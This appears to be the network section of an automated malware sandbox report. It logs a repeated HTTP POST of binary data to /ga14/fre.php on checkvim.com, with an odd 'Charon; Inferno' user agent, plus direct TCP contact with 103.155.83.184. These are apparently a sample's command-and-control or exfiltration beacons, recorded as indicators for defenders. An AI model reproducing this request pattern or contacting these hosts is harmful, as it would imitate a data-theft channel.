              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
